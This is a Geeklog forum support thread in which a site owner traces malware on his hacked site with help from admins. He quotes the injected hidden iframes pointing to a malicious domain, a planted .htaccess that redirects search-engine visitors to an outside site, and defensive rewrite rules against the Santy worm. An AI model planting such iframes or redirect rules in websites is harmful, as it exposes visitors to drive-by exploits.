Welcome to Geeklog, Anonymous Thursday, March 28 2024 @ 08:38 am EDT

Geeklog Forums

Virus in gl 1.41


Status: offline

guganbl

Forum User
Chatty
Registered: 05/12/07
Posts: 57
artistic
I made gl 1.41 site to my friends in moto club , and on my great surprise now it has a virus!
I dont know how, i dont know so much about gl. but i need advice what to do......
When i open site kaspersky reports me :
1/19/2009 4:00:54 PM http://326g.com/forums/includes/hooks/system/index.php//index Internet Explorer Detected: Exploit.JS.Agent.aad
1/19/2009 4:00:54 PM http://326g.com/forums/includes/hooks/system/index.php//index Internet Explorer Denied: Exploit.JS.Agent.aad
1/19/2009 6:48:43 PM http://alink.belstom.ru/partners/system/index.php//index Internet Explorer Detected: Exploit.JS.Agent.aad
1/19/2009 6:48:43 PM http://alink.belstom.ru/partners/system/index.php//index Internet Explorer Denied: Exploit.JS.Agent.aad

I tried to disable all blocks and plugins but it is the same, and even google reports this site as blacklisted.

Any idea what to do and how to get rid of this stupid thing?
Theory of how is this possible would also help, since i i understend the problem i may be able to fix it.
Is it possible that someone with admin rights had virus on computer and virus migrated to gl somehow?
Thanx for help
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
IIRC, there was a series of server breakins a while ago that left JavaScript code in websites. See if you can figure out where it was injected in your Geeklog install (start with the layout directory).

Feel free to contact us through our security contact if you can't figure it out yourself.

bye, Dirk
 Quote

Status: offline

guganbl

Forum User
Chatty
Registered: 05/12/07
Posts: 57
brainy
Well i have checked in layout folder, i even tryed to replace all files ( made a backup of gl folder in march 2008 so i have all the original files) but it was the same......
I`m thinking about uploading backup from march folder and keeping mediagallery and articles folder from infected version. What do you think would it work ?
 Quote

Status: offline

guganbl

Forum User
Chatty
Registered: 05/12/07
Posts: 57
brainy
Found code in mediaglaery/index.php here it is :
?<html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola19" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litedownloadseek.cn/in.cgi?cocacola16" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litedownloadseek.cn/in.cgi?cocacola17" width=1 height=1 style="visibility: hidden"></iframe></body></html>>

and in publichtml\index.php:
?><html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola19" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litedownloadseek.cn/in.cgi?cocacola16" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litedownloadseek.cn/in.cgi?cocacola17" width=1 height=1 style="visibility: hidden"></iframe></body></html>

I removed these codes and now it seems ok , for now no report of virus....

\Site is on url:
http://www.banjalukasport.com/marshal/public_html/

So i dont know did it infiltreted more files , but for now i dont get any errors from kaspersky while browsing the site.
Question is how to prevent this from happening again?
Kind regards,
Sasa
 Quote

Status: offline

guganbl

Forum User
Chatty
Registered: 05/12/07
Posts: 57
brainy
Found the same stupid code in \forum\index.php
 Quote

Status: offline

Laugh

Site Admin
Admin
Registered: 09/27/05
Posts: 1468
Location:Canada
Quote by: guganbl

Found the same stupid code in forumindex.php



Unless you know when the hack happened and can restore the files before that it is always best to delete all directories and to start with fresh files from the install packages.

Once you remove all infected files I believe you can use Google Webmaster Tools to contact Google to get your site off their blacklist.
One of the Geeklog Core Developers.
 Quote

Status: offline

guganbl

Forum User
Chatty
Registered: 05/12/07
Posts: 57
Huh, just wanted to go to google webmaster tools to report that site is ok , and found it again Frown

Here is what happens.......
When i go to site thru this url :
http://www.banjalukasport.com/marshal/public_html/ , everithing is ok , no virus.
but if i go this way http://www.banjalukasport.com/marshal/ i get virus report and automatically something changes http://www.banjalukasport.com/marshal/public_html/index.php file , it adds a new line at the end of it.

This is more painful than i thought it will be Frown

:shock:
 Quote

Status: offline

guganbl

Forum User
Chatty
Registered: 05/12/07
Posts: 57
artistic
I write this much here since someone will have this problem and it will be easier to solve it.
Found it again, in index.pho in geeklog dir . So what i found until now is that all index.php files were infected. So it is safe to conclude that it has permissions to write to those files somehow.

Does anyone have the idea how to stop this from happening ?

I will now continue my SD mission
Evil
 Quote

alway-guest

Anonymous
Quote by: guganbl

I write this much here since someone will have this problem and it will be easier to solve it.
Found it again, in index.pho in geeklog dir . So what i found until now is that all index.php files were infected. So it is safe to conclude that it has permissions to write to those files somehow.

Does anyone have the idea how to stop this from happening ?

I will now continue my SD mission
Evil


no idea sir, because it happen only on your site. if other GL users have the same problem as you, they may report to GL headquarter already.
 Quote

Status: offline

Laugh

Site Admin
Admin
Registered: 09/27/05
Posts: 1468
Location:Canada
Where those files always infected? Did you scan all text files for the code?

If you are using windows you can deny modify rights to your website files for your internet user guest account (the one used by IIS).
One of the Geeklog Core Developers.
 Quote

Status: offline

guganbl

Forum User
Chatty
Registered: 05/12/07
Posts: 57
Hosting is on linux , and i have found virus code in every file that has a name index.php for example public_html\index.php , media gallery\inedx.php , calendar\index.php , etc........

For now it looks like i removed code from all files, but i dont know how did it get there , so it means that i will happen again.
 Quote

govezone

Anonymous
I too have the same problem described above and I'm hosting with Liquid Web. So they are affecting some kind of security whole I presume. The tech guys are looking into it as a write this. I'll post results once I figure it out.
 Quote

Status: offline

guganbl

Forum User
Chatty
Registered: 05/12/07
Posts: 57
It happens again and again every time, i clean all files and after some times they are afected again. I really don`t know how is this possible ..... I`m hosted with Godaddy , and i`m gonna ask for their tech support also. Maybe it will help to figure out what is happening...... If you get any news please share , and i will do the same.
Regards
Sasa
 Quote

Status: offline

guganbl

Forum User
Chatty
Registered: 05/12/07
Posts: 57
Just now found something strange i found file named .htaccess in gl root and in public_html

with this content:
RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]


RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]


RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]

RewriteRule .* http://j-5.info/2/go.php?sid=2 [R,L]

These files were not here before as much as i remember but i dont know what this means , could this be a reason how someone can change my files ?

I know that this .htacces file in root of my hosting has something with permissions but i dont know what tese two files are doing in my gl ?

 Quote

Status: offline

Chrispcritters

Forum User
Chatty
Registered: 05/11/05
Posts: 49
Location:Tustin, CA
This sounds more like your hosting account has been compromised than a Geeklog issue. Have you checked your logs with your host? Have you changed your hosting account password?
 Quote

Status: offline

guganbl

Forum User
Chatty
Registered: 05/12/07
Posts: 57
I`m gonna do that right now, and i wrote an e-mail to tech support for hosting...
 Quote

Status: offline

guganbl

Forum User
Chatty
Registered: 05/12/07
Posts: 57
I think i know what the problem is , my original root .htaccess file also looks strange, but i dont have backup of old one, so i need some help to fix it. Here is what is inside :
# -FrontPage-



IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*



<Limit GET POST>

order deny,allow

deny from all

allow from all

</Limit>

<Limit PUT DELETE>

order deny,allow

deny from all

</Limit>

# attempts to stop the Santy worm

RewriteEngine On

RewriteCond %{QUERY_STRING} ^(.*)wget%20 [OR]

RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]

RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]

RewriteCond %{QUERY_STRING} ^(.*)highlight=%2527 [OR]

RewriteCond %{HTTP_USER_AGENT} lwp-trivial [NC,OR]

RewriteCond %{HTTP_COOKIE}% sFrown.*):%22test1%22%3b

RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]

# Referrer spam :-(

RewriteCond %{HTTP_REFERER} ^http://.*hosting4u.gb.com.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} ^http://.*4free.gb.com.*$ [NC]

RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]

ErrorDocument 404 /404.php

Redirect 403 /sport/config.php

Redirect 403 /buk/config.php

Redirect 403 /geeklog/config.php

Redirect 403 /marshal/config.php

At the end are dirs of my four gl sites, one of them i compromised for now , but how do i fix this file , please help :shock:
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Sorry for not having the time to look into this earlier. Seems like you pretty much figured things out with the help of others already. I agree with Chrispitters (and said as much in my original response): This looks like your hosting account - or maybe even the entire server - has been compromised. You may want to contact your hosting service.

Quote by: guganbl

At the end are dirs of my four gl sites, one of them i compromised for now , but how do i fix this file , please help :shock:


Geeklog itself doesn't really require a .htaccess file, so you could simply delete it.

Some of the rules you quoted look like they came from this post. They can help reduce the server load but are not strictly necessary.

I'd say start over with a fresh .htaccess (once you know what actually happened and can be sure it won't happen again) and then add rules as you need them.

bye, Dirk
 Quote

Status: offline

guganbl

Forum User
Chatty
Registered: 05/12/07
Posts: 57
brainy
I figured out almost everything, i still didn`t get answer from my hosting support ( it`s written that they will answer in 8 hours, but its more than 24 already ) and only thing that i`m not sure is this .htaccess file that i have ok.
So if you can look over it it would be great help, just to eliminate chance that there is error there.
Kind regards
:shakehands:
 Quote

Status: offline

guganbl

Forum User
Chatty
Registered: 05/12/07
Posts: 57
Ok , here is conclusion , just to help in case someone else is in same kind of trouble :
Ftp account that had access to this infected gl installation was compromised . Person that used that account had virus on his computer and i guess that it send its secrets to somewhere.
Someone was clever enough to put .htmaccess file in gl folder and with that gained access to some gl files, and whenever i fix them they were soon infected again. So cure was to remove that .htmaccess file, to download gl directory to my computer and to scan it with antivirus software . Than look at the log of av and go file by file and remove virus code or replace file.
For now it worked, second day and no virus reported.
Thanx everyone for help
:shakehands:
 Quote

All times are EDT. The time is now 08:38 am.

  • Normal Topic
  • Sticky Topic
  • Locked Topic
  • New Post
  • Sticky Topic W/ New Post
  • Locked Topic W/ New Post
  •  View Anonymous Posts
  •  Able to post
  •  Filtered HTML Allowed
  •  Censored Content